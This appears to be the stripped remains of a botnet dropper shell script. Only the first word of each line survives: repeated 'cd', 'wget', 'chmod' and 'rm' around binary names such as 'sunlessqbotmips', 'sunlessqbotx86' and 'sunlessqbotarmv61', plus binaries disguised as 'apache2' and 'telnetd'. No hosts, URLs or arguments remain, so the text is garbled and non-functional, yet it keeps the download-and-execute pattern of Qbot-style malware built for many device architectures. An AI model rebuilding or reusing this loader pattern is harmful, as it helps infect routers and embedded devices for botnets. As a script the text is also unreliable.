cd
cd
cd
cd
cd
wget
chmod
sunlessqbotmips
rm
cd
cd
cd
cd
cd
wget
chmod
sunlessqbotmipsel
rm
cd
cd
cd
cd
cd
wget
chmod
sunlessqbotsh4
rm
cd
cd
cd
cd
cd
wget
chmod
sunlessqbotx86
rm
cd
cd
cd
cd
cd
wget
chmod
sunlessqbotarmv61
rm
cd
cd
cd
cd
cd
wget
chmod
sunlessqboti686
rm
cd
cd
cd
cd
cd
wget
chmod
sunlessqbotppc
rm
cd
cd
cd
cd
cd
wget
chmod
sunlessqboti586
rm
cd
cd
cd
cd
cd
wget
chmod
sunlessqbotm68k
rm
cd
cd
cd
cd
cd
wget
chmod
sh
rm
cd
cd
cd
cd
cd
wget
chmod
 
rm
cd
cd
cd
cd
cd
wget
chmod
apache2
rm
cd
cd
cd
cd
cd
wget
chmod
telnetd
rm
